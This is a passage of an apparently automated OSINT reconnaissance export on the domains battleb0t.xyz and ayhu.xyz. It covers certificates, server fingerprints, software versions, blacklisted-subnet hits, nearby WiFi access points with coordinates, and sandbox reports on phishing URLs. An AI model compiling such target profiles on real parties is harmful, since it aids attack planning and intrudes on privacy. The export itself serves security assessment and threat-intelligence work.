bit)<br>Modulus:<br>00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:<br>fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:<br>b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:<br>02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:<br>e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:<br>41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:<br>b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:<br>d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:<br>38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:<br>39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:<br>72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:<br>f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:<br>b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:<br>4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:<br>71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:<br>ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:<br>29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:<br>f8:db<br>Exponent: 65537 (0x10001)<br>X509v3 extensions:<br>X509v3 Key Usage: critical<br>Digital Signature, Key Encipherment<br>X509v3 Extended Key Usage:<br>TLS Web Server Authentication, TLS Web Client Authentication<br>X509v3 Basic Constraints: critical<br>CA:FALSE<br>X509v3 Subject Key Identifier:<br>3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A<br>X509v3 Authority Key Identifier:<br>keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6<br>Authority Information Access:<br>OCSP - URI:http://r3.o.lencr.org<br>CA Issuers - URI:http://r3.i.lencr.org/<br>X509v3 Subject Alternative Name:<br>DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz<br>X509v3 Certificate Policies:<br>Policy: 2.23.140.1.2.1<br>Policy: 1.3.6.1.4.1.44947.1.1.1<br>CPS: http://cps.letsencrypt.org<br>CT Precertificate Poison: critical<br>NULL<br>Signature Algorithm: sha256WithRSAEncryption<br>26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:<br>a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:<br>8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:<br>6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:<br>c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:<br>f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:<br>b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:<br>b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:<br>26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:<br>d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:<br>40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:<br>2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:<br>8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:<br>1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:<br>4e:9f:6c:9d |
| 2023-05-12 03:01:26 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi2.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi2.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] | nwapi2.battleb0t.xyz |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Snapchat Stories (Category: social)<br>https://story.snapchat.com/s/battleb0t | battleb0t |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Google Trust Services LLC,CN=GTS CA 1P5 | ayhu.xyz |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:12 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Nginx | kekw.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AOSS-DESKTOP1-47290 (Net ID: 00:00:5C:81:7F:C0) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.244): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:97:3D) | 50.1188, 8.6843 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5913389a552a51-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.253): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 46.101.229.70 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 03:33:45 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx | https://pics.battleb0t.xyz/images/ein_2.png |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c5b59d17bc80231-ORD<br>Content-Encoding: gzip | 188.114.97.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DONNYMC (Net ID: 00:09:5B:CF:7C:14) | 39.0469, -77.4903 |
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Cloudflare | vscode.battleb0t.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.177): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.133): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.224): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Tacklebox AirNet (Net ID: 00:02:2D:0D:4F:2B) | 37.7642, -122.3993 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hollyhome (Net ID: 00:04:5A:FD:2E:C9) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.219 | 104.196.30.220 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00d2.github.io |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 2 | 0 | 3 | 0 | None | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:44:10 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | MariaDB MariaDB 10.5.19 | 87.248.157.102 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gettr (Category: social)<br>https://gettr.com/user/login | login |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:42:61) | 41.8781, -87.6298 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | P2d8T7f2d$ (Net ID: 00:18:0A:DF:7D:60) | 32.8608, -79.9746 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.216): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:04:E2:FB:95:10) | 39.0469, -77.4903 |
| 2023-05-12 02:53:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fhome-docs.webflow.io%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:7648:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7648:304:WilStaging_02"\n "Local\\SM0:7648:120:WilError_01"\n "SM0:7648:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "138.91.254.96:443"\n "172.66.43.150:443"\n "151.101.2.132:443"\n "35.186.254.174:443"\n "65.8.158.125:443"\n "65.8.165.43:443"\n "20.50.201.201:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n 
"api.salesflare.com"\n "d3e54v103j8qbb.cloudfront.net"\n "home-docs.webflow.io"\n "llink.to"\n "self.events.data.microsoft.com"\n "track.salesflare.com"\n "uploads-ssl.webflow.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n 
""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API 
Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.148.664.8402708624568094443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000148]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\148_306407055\\edge_driver.js]- [targetUID: 00000000-00000148]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00000148]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00000148]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00000148]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\148_306407055\\bnpl\\bnpl.bundle.js]- 
[targetUID: 00000000-00000148]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\148_306407055\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00000148]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00000148]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00000148]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00000148]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\148_431447688\\edge_autofill_field_data.json]- [targetUID: 00000000-00000148]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00000148]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\History]- [targetUID: 00000000-00000148]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: N/A]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- Location: [%TEMP%\\148_306407055\\json\\wallet\\wallet-checkout-eligible-sites-pre-stable.json]- [targetUID: 00000000-00000148]\n "Web Data" has type "SQLi | 185.199.109.153 |
| 2023-05-12 02:56:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://keyzstoreoracle.org/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dbc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dbc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_dbc_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "IsoScope_dbc_IE_EarlyTabStart_0xf74_Mutex"\n "IsoScope_dbc_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3516"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_dbc_ConnHashTable<3516>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"keyzstoreoracle.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:80"\n "96.6.31.32:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"keyzstoreoracle.org"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "GNHNKDR2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GNHNKDR2.txt]- [targetUID: 00000000-00003516]\n Dropped file: "872UMPTE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\872UMPTE.txt]- [targetUID: 00000000-00003516]\n Dropped file: "P1JMAX91.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1JMAX91.txt]- [targetUID: 00000000-00003516]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DFD0369D8D88B34BD1.TMP" has type "data"- Location: [%TEMP%\\~DFD0369D8D88B34BD1.TMP]- [targetUID: 00000000-00003516]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003516]\n "_E5961C44-4C47-11ED-BAE3-080027B2FD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "GNHNKDR2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GNHNKDR2.txt]- [targetUID: 00000000-00003516]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 frames 3"- [targetUID: N/A]\n "ErrorPageTemplate_1_" has type "UTF-8 